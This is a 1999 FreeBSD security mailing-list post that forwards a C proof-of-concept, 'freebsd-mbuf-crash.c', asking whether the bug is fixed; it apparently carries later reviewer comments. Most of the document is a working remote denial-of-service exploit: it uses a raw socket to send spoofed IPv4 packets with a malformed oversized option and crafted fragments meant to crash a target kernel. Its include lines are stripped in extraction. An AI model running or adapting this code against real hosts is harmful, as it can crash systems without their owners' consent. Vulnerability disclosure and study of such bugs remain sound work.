From owner-freebsd-security Tue May 4 8:52:43 1999
Delivered-To: freebsd-security@freebsd.org
Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by hub.freebsd.org (Postfix) with ESMTP id 4D2FD14FBD for ; Tue, 4 May 1999 08:52:28 -0700 (PDT) (envelope-from avalon@cheops.anu.edu.au)
Received: (from avalon@localhost) by cheops.anu.edu.au (8.9.1/8.9.1) id BAA29421 for freebsd-security@freebsd.org; Wed, 5 May 1999 01:26:39 +1000 (EST)
From: Darren Reed
Message-Id: <199905041526.BAA29421@cheops.anu.edu.au>
Subject: freebsd mbuf crash
To: freebsd-security@freebsd.org
Date: Wed, 5 May 1999 01:26:38 +1000 (EST)
X-Mailer: ELM [version 2.4 PL23]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

is this one (below) taken care of ? perhaps a derivative of this ?

darren

/* freebsd-mbuf-crash.c by Jeff Roberson, (jeffr@nwlink.com). Dec 11 1998.
 * I'm only releasing this as an example because the bug hardly ever reliably crashes a machine.
*/
/* The header names of every #include below were lost when the archive was
 * extracted (angle brackets stripped); they are left exactly as found. */
#include
#include
#include
#define __FAVOR_BSD   /* select the BSD field names (th_sport, th_flags, ...) in struct tcphdr */
#include
#include
#include
#include
#include
#include

/*
 * Resolve `host` (dotted quad first, then a name lookup) to a network-order
 * IPv4 address. Returns (u_long)-1 when the name lookup fails.
 *
 * NOTE(review): `addr` is u_long, so on LP64 targets sizeof(addr) is 8 while
 * h_addr_list[0] points at h_length (4) bytes -- the bcopy over-reads past
 * the address. Copying h_length bytes into an in_addr_t would be the right
 * size on every target.
 * NOTE(review): the -1 sentinel has the same 32-bit pattern as INADDR_NONE
 * (conventionally 0xffffffff), so a limited-broadcast address cannot be
 * told apart from a lookup failure.
 */
u_long htona(char *host) {
    u_long addr;
    struct hostent *hp;
    if ((addr=inet_addr(host)) == INADDR_NONE) {
        if ((hp = gethostbyname(host)) == NULL)
            return(-1);
        bcopy(hp->h_addr_list[0], &addr, sizeof(addr));
    }
    return(addr);
}

/*
 * Original proof-of-concept, code unchanged. Builds one raw IPv4 datagram in
 * buf whose header claims ip_hl=15 (60 bytes: 20 fixed + 40 of options),
 * places a TCP header at offset 60, and sends it three times through a raw
 * socket. The comments only spell out the field values as set, i.e. the input
 * a receiving IP stack has to validate.
 *
 * NOTE(review): the message does not say which kernel path fails ("mbuf
 * crash" is all it states). The inputs involved are an IP option whose
 * claimed length (26) runs over bytes set to 0xff, and a two-fragment
 * sequence (IP_MF then offset 8), so option-length bounds checking and
 * fragment reassembly are the places to look -- unconfirmed from this page.
 */
int main(int argc, char* argv[]) {
    char buf[128];
    struct ip *iph = (struct ip *)buf;
    u_char *ipoptions = (u_char *)(buf + sizeof(struct ip));   /* options begin right after the 20-byte fixed header */
    struct tcphdr *tcph = (struct tcphdr *)(buf + 60);          /* matches ip_hl=15 (15 * 4 == 60) */
    int s, i;
    struct sockaddr_in sin;   /* NOTE(review): never zeroed; fields other than the three set below stay indeterminate */
    if (argc != 2) {
        printf("usage\n\t%s \n", argv[0]);   /* the argument name after %s was lost in extraction */
        exit(1);
    }
    s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);   /* IPPROTO_RAW: the program supplies the whole IP header itself */
    if (s < 0) {
        perror("socket");
        exit(1);
    }
    sin.sin_family = AF_INET;
    sin.sin_port = htons(7);
    sin.sin_addr.s_addr = htona(argv[1]);
    if (sin.sin_addr.s_addr == -1) {   /* depends on -1 converting to the same bit pattern htona returns on failure */
        printf("Error resolving %s\n", argv[1]);
        exit(1);
    }
    bzero(buf, sizeof(buf));       /* every field not assigned below, including ip_sum, stays 0 */
    iph->ip_hl=15;                 /* 60-byte header: 20 fixed + 40 option bytes */
    iph->ip_v=4;
    iph->ip_len=htons(124);        /* 60 header + 64 bytes after it; buf is 128 so this fits */
    iph->ip_id= htons(getpid());
    iph->ip_off= htons(IP_MF);     /* "more fragments" set, fragment offset 0 */
    iph->ip_ttl = 255;
    iph->ip_p = IPPROTO_TCP;
    /* NOTE(review): copies sizeof(u_long) bytes into the 4-byte ip_dst; on LP64 the
     * extra 4 bytes land in ipoptions[0..3], which the loop below then overwrites. */
    bcopy(&sin.sin_addr.s_addr, &iph->ip_dst, sizeof(u_long));
    iph->ip_src.s_addr = htona("10.2.3.4");   /* fixed source address unrelated to the sending host */
    for (i = 0; i < 20;i++) {
        ipoptions[i]=0xff;         /* superseded by the memset below */
    }
    ipoptions[0] = 0xff; /* Made up option */   /* option type, not one the author treats as real */
    ipoptions[1] = 0x1a;                        /* claimed option length: 26 */
    memset((char *)&ipoptions[2], 0xff, 37);    /* option bytes 2..38 */
    ipoptions[39] = 1; /* IP_NOP */             /* last of the 40 option bytes */
    tcph->th_sport = htons(5505);
    tcph->th_dport = htons(23);
    tcph->th_seq = htonl(0xabcde123);
    tcph->th_ack = htonl(0x321edcba);
    tcph->th_flags = TH_ACK | TH_PUSH;
    tcph->th_win = htons(0x1234);   /* remaining TCP fields keep the 0 from the bzero */
    if (sendto(s, buf, 124, 0, (struct sockaddr *)&sin, sizeof(struct sockaddr)) < 124) {
        perror("sendto");
        exit(1);
    }
    /* the identical datagram a second time */
    if (sendto(s, buf, 124, 0, (struct sockaddr *)&sin, sizeof(struct sockaddr)) < 124) {
        perror("sendto");
        exit(1);
    }
    iph->ip_len = htons(80);
    iph->ip_off = htons(8);        /* IP_MF cleared, fragment offset 8 (8 * 8 == 64 bytes): presented as the last fragment */
    /* NOTE(review): 80 bytes are sent but the check accepts anything >= 60 */
    if (sendto(s, buf, 80, 0, (struct sockaddr *)&sin, sizeof(struct sockaddr)) < 60) {
        perror("sendto");
        exit(1);
    }
    exit(0);
}
/* --- archive mailing-list footer follows; not part of the program --- */
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe
freebsd-security" in the body of the message